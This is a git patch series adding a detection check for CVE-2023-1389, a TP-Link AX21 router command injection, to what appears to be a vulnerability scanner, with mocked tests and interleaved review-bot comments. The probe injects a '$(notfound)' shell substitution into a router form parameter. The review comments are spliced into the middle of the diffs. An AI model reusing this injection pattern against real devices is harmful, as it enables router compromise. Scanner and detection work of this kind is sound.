From 2651faa774b84f5c6b74033d3c5f9a726f1059ff Mon Sep 17 00:00:00 2001
From: Alaeddine Mesbahi
Date: Mon, 27 Nov 2023 11:52:11 +0100
Subject: [PATCH 1/5] Detection for CVE-2023-1389.
---
 agent/definitions.py | 4 ++
 agent/exploits/cve_2023_1389.py | 92 ++++++++++++++++++++++++++++
 tests/exploits/cve_2023_1389_test.py | 59 ++++++++++++++++++
 3 files changed, 155 insertions(+)
 create mode 100644 agent/exploits/cve_2023_1389.py
 create mode 100644 tests/exploits/cve_2023_1389_test.py
diff --git a/agent/definitions.py b/agent/definitions.py
index 066d44f7..9e4ce8ef 100644
--- a/agent/definitions.py
+++ b/agent/definitions.py
@@ -13,6 +13,10 @@ class Target:
 port: int
 path: str = "/"
+ @property
+ def url(self) -> str:
+ return f"{self.scheme}://{self.host}:{self.port}{self.path}"
+
 @dataclasses.dataclass
 class Vulnerability:
diff --git a/agent/exploits/cve_2023_1389.py b/agent/exploits/cve_2023_1389.py
new file mode 100644
index 00000000..b2edce4e
--- /dev/null
+++ b/agent/exploits/cve_2023_1389.py
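Review bot: The new `url` property has no docstring and silently depends on `path` ending in a slash for callers that append to it, which the test file in this patch does (`target.url + "cgi-bin/luci/"`); with `path="/api"` that concatenation yields `.../apicgi-bin/luci/`. Add `"""Base URL of the target, scheme://host:port followed by path verbatim (no trailing slash is added)."""` so callers know what they get, or have the new exploit build its request URLs from `url` instead of its own `f"{target.scheme}://{target.host}:{target.port}"`, which ignores `path` altogether. An IPv6 literal in `host` would also need brackets here; whether such hosts reach this dataclass is not visible in the hunk. The `Target` dataclass starts outside the hunk.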
@@ -0,0 +1,92 @@
+"""Agent Asteroid implementation for CVE-2023-1389"""
+
+import requests
+from ostorlab.agent.kb import kb
+from ostorlab.agent.mixins import agent_report_vulnerability_mixin
+from requests import exceptions as requests_exceptions
+
+from agent import definitions
+from agent import exploits_registry
+
+VULNERABILITY_TITLE = "Remote Code Execution in TP-Link AX21"
+VULNERABILITY_REFERENCE = "CVE-2023-1389"
+VULNERABILITY_DESCRIPTION = (
+ "TP-Link AX21 suffers from Remote Code Execution (RCE) vulnerability. The vulnerability"
+ " has been added to the Mirai botnet Arsenal and is actively being targeted by in the"
+ " wild."
+)
+
+
+DEFAULT_TIMEOUT = 90
+
+
+@exploits_registry.register
+class CVE20231389Exploit(definitions.Exploit):
+ """CVE-2023-1389: Remote Code Execution in TP-Link AX21."""
+
+ def accept(self, target: definitions.Target) -> bool:
+ target_uri = f"{target.scheme}://{target.host}:{target.port}/cgi-bin/luci/"
+ try:
+ response = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
+ if response.status_code == 200:
+ return True
+ else:
+ return False
+ except requests_exceptions.RequestException:
+ return False
+
+ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+ target_uri = f"{target.scheme}://{target.host}:{target.port}"
+ try:
+ response = requests.get(
+ target_uri
+ + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)",
+ verify=False,
+ timeout=DEFAULT_TIMEOUT,
+ )
+ # TODO(OS-6117): Approximate check that needs a live instance to validate the issue.
+ if response.status_code == 500:
+ vulnerability = self._generate_vulnerability_object(
+ target_uri, response.text
+ )
+ return [vulnerability]
+
+ except requests_exceptions.RequestException:
+ return []
+
+ return []
+
+ def _generate_vulnerability_object(
+ self, target_uri: str, response_body: str
+ ) -> definitions.Vulnerability:
+ entry = kb.Entry(
+ title=VULNERABILITY_TITLE,
+ risk_rating="CRITICAL",
+ short_description=VULNERABILITY_DESCRIPTION,
+ description=VULNERABILITY_DESCRIPTION,
+ references={
+ "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}",
+ "TP-Link Advisory": "https://www.tp-link.com/us/support/faq/3643/",
+ "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94",
+ },
+ recommendation=(
+ "- Make sure to install the latest security patches from software vendor \n"
+ "- Update to the latest software version"
+ ),
+ security_issue=True,
+ privacy_issue=False,
+ has_public_exploit=True,
+ targeted_by_malware=True,
+ targeted_by_ransomware=True,
+ targeted_by_nation_state=True,
+ )
+ technical_detail = (
+ f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE},"
+ f" {VULNERABILITY_TITLE}."
+ )
+ vulnerability = definitions.Vulnerability(
+ entry=entry,
+ technical_detail=technical_detail,
+ risk_rating=agent_report_vulnerability_mixin.RiskRating.CRITICAL,
+ )
+ return vulnerability
diff --git a/tests/exploits/cve_2023_1389_test.py b/tests/exploits/cve_2023_1389_test.py
new file mode 100644
index 00000000..b1f41828
--- /dev/null
+++ b/tests/exploits/cve_2023_1389_test.py
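Review bot: `check` reports a CRITICAL finding on nothing more than a 500 status for the probe URL, and `accept` admits any host whose `/cgi-bin/luci/` answers 200, so an unrelated OpenWrt/LuCI device whose locale form errors out on any write will be reported as an exploitable TP-Link AX21; the TODO(OS-6117) acknowledges this, but the rating does not reflect it. A cheap way to cut false positives is a differential request: send the same form write with the plain value `notfound` first and only treat a 500 on the `$(notfound)` variant as a signal when the control did not also return 500 (whether the vulnerable firmware distinguishes the two needs the live-instance validation the TODO refers to). Both `requests.get` calls also pass `verify=False`; that is reasonable for scanning devices with self-signed certificates, but it deserves a one-line comment such as `# verify=False: embedded devices commonly ship self-signed certificates` so it is not later "fixed" by a linter pass. `check` further ignores `target.path`, unlike the `url` property added to `Target` in this patch. The whole class is inside the hunk.
```python
    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
        target_uri = f"{target.scheme}://{target.host}:{target.port}"
        form = "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country="
        try:
            # Control: the same write with a plain value. A host that errors on
            # any write to this form gives no evidence of the injection sink.
            control = requests.get(
                target_uri + form + "notfound", verify=False, timeout=DEFAULT_TIMEOUT
            )
            if control.status_code == 500:
                return []
            response = requests.get(
                target_uri + form + "$(notfound)", verify=False, timeout=DEFAULT_TIMEOUT
            )
        except requests_exceptions.RequestException:
            return []
        # TODO(OS-6117): Approximate check that needs a live instance to validate the issue.
        if response.status_code == 500:
            return [self._generate_vulnerability_object(target_uri, response.text)]
        return []
    # … unchanged: _generate_vulnerability_object …
```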
@@ -0,0 +1,59 @@
+"""Unit tests for Agent Asteriod exploits"""
+
+import requests_mock as req_mock
+
+
+from agent import definitions
+from agent.exploits import cve_2023_1389
+
+
+def testCVE20231389_whenVulnerable_reportFinding(
+ requests_mock: req_mock.mocker.Mocker,
+) -> None:
+ target = definitions.Target("https", "109.239.246.106", 10443)
+ requests_mock.get(
+ target.url + "cgi-bin/luci/",
+ status_code=200,
+ )
+ requests_mock.get(
+ target.url
+ + "cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)",
+ status_code=500,
+ )
+
+ exploit_instance = cve_2023_1389.CVE20231389Exploit()
+ accept = exploit_instance.accept(target)
+ vulnerabilities = exploit_instance.check(target)
+
+ assert accept is True
+ assert len(vulnerabilities) > 0
+ vulnerability = vulnerabilities[0]
+
+ assert vulnerability.entry.title == "Remote Code Execution in TP-Link AX21"
+ assert (
+ vulnerability.technical_detail
+ == "https://109.239.246.106:10443 is vulnerable to CVE-2023-1389, Remote Code Execution in TP-Link AX21."
+ )
+ assert vulnerability.entry.risk_rating == "CRITICAL"
+
+
+def testCVE20231389_whenNotVulnerable_reportNoFinding(
+ requests_mock: req_mock.mocker.Mocker,
+) -> None:
+ target = definitions.Target("https", "109.239.246.106", 10443)
+ requests_mock.get(
+ target.url + "cgi-bin/luci/",
+ status_code=404,
+ )
+ requests_mock.get(
+ target.url
+ + "cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)",
+ status_code=404,
+ )
+
+ exploit_instance = cve_2023_1389.CVE20231389Exploit()
+ accept = exploit_instance.accept(target)
+ vulnerabilities = exploit_instance.check(target)
+
+ assert accept is False
+ assert len(vulnerabilities) == 0
From 36a90f867ace68f5014896828670b510bc5e738d Mon Sep 17 00:00:00 2001
From: Alaeddine Mesbahi
Date: Mon, 27 Nov 2023 11:58:32 +0100
Subject: [PATCH 2/5] Fix linting.
---
 agent/exploits/cve_2023_1389.py | 14 +++++--------
 1 file changed, 5 insertions(+), 9 deletions(-)
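Review bot: Both tests build `Target("https", "109.239.246.106", 10443)`, a public-looking address; requests_mock intercepts only the two registered URLs (an unmatched URL raises `NoMockAddress`), and a later test that forgets the fixture would point at a real host. Use a loopback or RFC 5737 documentation address instead, `target = definitions.Target("https", "192.0.2.1", 10443)`, and update the `technical_detail` assertion accordingly. The suite also never exercises the `RequestException` branches of `accept` and `check`; a third test registering `requests_mock.get(url, exc=requests.exceptions.ConnectTimeout)` (with `import requests`) and asserting `accept` is `False` and `check` returns `[]` would cover them. "Asteriod" in the module docstring is a typo of Asteroid that patch 3 keeps.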
diff --git a/agent/exploits/cve_2023_1389.py b/agent/exploits/cve_2023_1389.py
index b2edce4e..a7016ea7 100644
--- a/agent/exploits/cve_2023_1389.py
+++ b/agent/exploits/cve_2023_1389.py
@@ -28,10 +28,7 @@ def accept(self, target: definitions.Target) -> bool:
 target_uri = f"{target.scheme}://{target.host}:{target.port}/cgi-bin/luci/"
 try:
 response = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
- if response.status_code == 200:
- return True
- else:
- return False
+ return response.status_code == 200
 except requests_exceptions.RequestException:
 return False
@@ -46,9 +43,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
 )
 # TODO(OS-6117): Approximate check that needs a live instance to validate the issue.
 if response.status_code == 500:
- vulnerability = self._generate_vulnerability_object(
- target_uri, response.text
- )
+ vulnerability = self._generate_vulnerability_object(target_uri)
 return [vulnerability]
 except requests_exceptions.RequestException:
@@ -57,7 +52,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
 return []
 def _generate_vulnerability_object(
- self, target_uri: str, response_body: str
+ self, target_uri: str
 ) -> definitions.Vulnerability:
 entry = kb.Entry(
 title=VULNERABILITY_TITLE,
@@ -67,7 +62,8 @@ def _generate_vulnerability_object(
 references={
 "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}",
 "TP-Link Advisory": "https://www.tp-link.com/us/support/faq/3643/",
- "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94",
+ "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389"
+ "-rce-in-tp-link-archer-ax21-d7a60f259e94",
 },
 recommendation=(
 "- Make sure to install the latest security patches from software vendor \n"
From de01e55457e826186939b6833742c7639f451b0f Mon Sep 17 00:00:00 2001
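Review bot: Dropping `response.text` from `_generate_vulnerability_object` (hunks `@@ -46,9 +43,7 @@` and `@@ -57,7 +52,7 @@`) removes an unused parameter, but it also leaves the finding with no evidence beyond the URL: `technical_detail` does not record which request was sent or that a 500 was observed, which is what a triager needs given the TODO(OS-6117) caveat on the check. Consider passing the status code through instead of discarding the response, and appending it to the detail, e.g. `f" The locale form write returned HTTP {status_code}."`. The `check` and `_generate_vulnerability_object` definitions extend beyond these hunks.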
From: Alaeddine Mesbahi
Date: Mon, 27 Nov 2023 13:42:06 +0100
Subject: [PATCH 3/5] Update tests/exploits/cve_2023_1389_test.py
Co-authored-by: PiranhaSa
---
 tests/exploits/cve_2023_1389_test.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tests/exploits/cve_2023_1389_test.py b/tests/exploits/cve_2023_1389_test.py
index b1f41828..3660e969 100644
--- a/tests/exploits/cve_2023_1389_test.py
+++ b/tests/exploits/cve_2023_1389_test.py
@@ -1,4 +1,4 @@
-"""Unit tests for Agent Asteriod exploits"""
+"""Unit tests for Agent Asteriod: CVE-2023-1389"""
 import requests_mock as req_mock
From f0137f55ad758edc226c8b0ad06ef3208716d3a6 Mon Sep 17 00:00:00 2001
From: Alaeddine Mesbahi
Date: Mon, 27 Nov 2023 13:54:15 +0100
Subject: [PATCH 4/5] Fix comment.
---
 tests/exploits/cve_2023_1389_test.py | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/tests/exploits/cve_2023_1389_test.py b/tests/exploits/cve_2023_1389_test.py
index b1f41828..3252fa56 100644
--- a/tests/exploits/cve_2023_1389_test.py
+++ b/tests/exploits/cve_2023_1389_test.py
@@ -10,6 +10,7 @@
 def testCVE20231389_whenVulnerable_reportFinding(
 requests_mock: req_mock.mocker.Mocker,
 ) -> None:
+ """Test exploit report finding when 500 error is triggered."""
 target = definitions.Target("https", "109.239.246.106", 10443)
 requests_mock.get(
 target.url + "cgi-bin/luci/",
@@ -40,6 +41,7 @@ def testCVE20231389_whenVulnerable_reportFinding(
 def testCVE20231389_whenNotVulnerable_reportNoFinding(
 requests_mock: req_mock.mocker.Mocker,
 ) -> None:
+ """Test exploit don't report finding on 404 pages."""
 target = definitions.Target("https", "109.239.246.106", 10443)
 requests_mock.get(
 target.url + "cgi-bin/luci/",
From 29ab95b8d02d12b842e118cf346ed5e9dc2157e2 Mon Sep 17 00:00:00 2001
From: Alaeddine Mesbahi
Date: Mon, 27 Nov 2023 19:10:24 +0100
Subject: [PATCH 5/5] Update agent/exploits/cve_2023_1389.py
Co-authored-by: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com>
---
 agent/exploits/cve_2023_1389.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/agent/exploits/cve_2023_1389.py b/agent/exploits/cve_2023_1389.py
index a7016ea7..60926720 100644
--- a/agent/exploits/cve_2023_1389.py
+++ b/agent/exploits/cve_2023_1389.py
@@ -12,8 +12,8 @@
 VULNERABILITY_REFERENCE = "CVE-2023-1389"
 VULNERABILITY_DESCRIPTION = (
 "TP-Link AX21 suffers from Remote Code Execution (RCE) vulnerability. The vulnerability"
- " has been added to the Mirai botnet Arsenal and is actively being targeted by in the"
- " wild."
+ " has been added to the Mirai botnet Arsenal and is actively being targeted by threat actors"
+ " in the wild."
 )